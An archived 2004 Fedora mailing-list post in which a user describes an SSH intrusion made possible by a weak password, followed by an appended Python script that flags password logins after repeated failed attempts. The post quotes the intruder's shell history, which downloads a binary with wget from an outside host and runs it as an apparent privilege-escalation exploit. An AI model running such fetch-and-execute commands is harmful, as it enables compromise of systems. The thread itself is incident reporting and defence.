Vulnerability on FC3T2? Present in FC3?

richard mullens mullens at ntlworld.com
Mon Nov 22 22:15:27 UTC 2004


richard mullens wrote:

> Someone logged into my system on 13 Nov 2004
> I found the following in /var/log/wtmp
>
> 207-36-180-20.prt.primarydns.com
> demo.allegientsystems.com
>
> My user password was changed - but not the root password - and the 
> following commands had been executed:-
>
> w
> uname -a
> cat /etc/issue
> cd /tmp
> wget chebeleu.com/local
> chmod +x local
> ./local -d -r
> ./local -d -r
> lunx
> lynx
>
> There is a similar report dated 10-Nov-2004 at 
> http://episteme.arstechnica.com/eve/ubb.x?a=tpc&s=50009562&f=96509133&m=531005547631 
>
> where someone suggested it might be the exploit at 
> http://www.k-otik.com/exploits/12.05.hatorihanzo.c.php
>
> Anybody know any more?
>
Many thanks everybody.  I came here to learn and this is the proof that 
one should not have password = username.

Over 7 days, every five minutes or so, someone attempted to gain access 
to my system with root and all sorts of different account names.  
Finally they succeeded:-

[root at caesium ~]# grep -v uid /var/log/secure.2 |grep richard
Nov 13 22:33:42 caesium sshd[4586]: Accepted password for richard from ::ffff:207.36.180.20 port 41610 ssh2
Nov 13 22:34:18 caesium sshd[4633]: Accepted password for richard from ::ffff:208.251.178.235 port 55717 ssh2
[root at caesium ~]#

Time now to wipe the system and install FC3 using stronger passwords on 
my account.
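The pattern in this thread (days of password guesses against many account names, then an "Accepted password" line for one of them) can be surfaced from sshd's syslog output without hand-grepping. The following is an added example, not code from the original post or from Fedora; it assumes the classic sshd log format shown above in /var/log/secure, and the sample lines it parses are constructed, with documentation-range IP addresses used as placeholders.

```python
"""Flag SSH password logins that follow a run of failed guesses from the same source.

Added example for this thread (not the poster's code). Assumes sshd's classic
syslog line format, e.g.
  "Nov 13 22:33:42 caesium sshd[4586]: Accepted password for richard from ::ffff:207.36.180.20 port 41610 ssh2"
"""
import re
from collections import defaultdict

# Matches both success and failure lines; "invalid user" appears when the
# account does not exist on the host at all.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+ ssh2"
)

# Constructed sample log lines (not from the original post); 203.0.113.5 and
# 198.51.100.7 are documentation addresses used as placeholders.
SAMPLE_LINES = [
    "Nov 13 22:10:01 caesium sshd[4001]: Failed password for root from ::ffff:203.0.113.5 port 40001 ssh2",
    "Nov 13 22:15:03 caesium sshd[4010]: Failed password for invalid user admin from ::ffff:203.0.113.5 port 40002 ssh2",
    "Nov 13 22:20:05 caesium sshd[4020]: Failed password for invalid user test from ::ffff:203.0.113.5 port 40003 ssh2",
    "Nov 13 22:25:07 caesium sshd[4030]: Failed password for invalid user guest from ::ffff:203.0.113.5 port 40004 ssh2",
    "Nov 13 22:30:09 caesium sshd[4040]: Failed password for richard from ::ffff:203.0.113.5 port 40005 ssh2",
    "Nov 13 22:31:00 caesium sshd[4050]: Accepted publickey for alice from ::ffff:198.51.100.7 port 50000 ssh2",
    "Nov 13 22:33:42 caesium sshd[4586]: Accepted password for richard from ::ffff:203.0.113.5 port 41610 ssh2",
    "Nov 13 22:40:00 caesium sshd[4600]: pam_unix(sshd:session): session opened for user richard by (uid=0)",
]


def parse_line(line):
    """Return a dict for an Accepted/Failed sshd line, or None for anything else."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip = m.group("ip")
    if ip.startswith("::ffff:"):
        ip = ip[len("::ffff:"):]  # strip the IPv4-mapped IPv6 prefix seen in the post
    return {
        "ts": m.group("ts"),
        "result": m.group("result"),
        "method": m.group("method"),
        "user": m.group("user"),
        "ip": ip,
    }


def accepted_logins(lines):
    """The equivalent of the post's grep: every successful login as (user, ip, method)."""
    out = []
    for line in lines:
        ev = parse_line(line)
        if ev and ev["result"] == "Accepted":
            out.append((ev["user"], ev["ip"], ev["method"]))
    return out


def analyze(lines, threshold=5):
    """Alert on a password login from a source that already failed `threshold` or more times.

    Returns failure counts per source, the usernames each source tried, and
    the alerts. The log is processed in order, so only failures *before* the
    success count; a single lucky guess on the first try would not be flagged.
    """
    failures = defaultdict(int)       # ip -> failed attempts seen so far
    usernames = defaultdict(set)      # ip -> distinct account names guessed
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue  # session/pam lines and other noise are ignored
        ip = ev["ip"]
        if ev["result"] == "Failed":
            failures[ip] += 1
            usernames[ip].add(ev["user"])
        elif ev["method"] == "password" and failures[ip] >= threshold:
            alerts.append({
                "ts": ev["ts"],
                "ip": ip,
                "user": ev["user"],
                "prior_failures": failures[ip],
                "usernames_tried": sorted(usernames[ip]),
            })
    return {
        "failures": dict(failures),
        "usernames": {ip: sorted(u) for ip, u in usernames.items()},
        "alerts": alerts,
    }


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LINES)["alerts"]:
        print(f"{alert['ts']} password login for {alert['user']} from {alert['ip']} "
              f"after {alert['prior_failures']} failures "
              f"(tried: {', '.join(alert['usernames_tried'])})")
```

Run against a real file with `analyze(open("/var/log/secure").read().splitlines())`; the publickey login from an unrelated address is parsed but never alerted on, and a source that never failed before succeeding is not flagged either, so the output is the short list worth reading rather than the whole log.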




More information about the fedora-test-list mailing list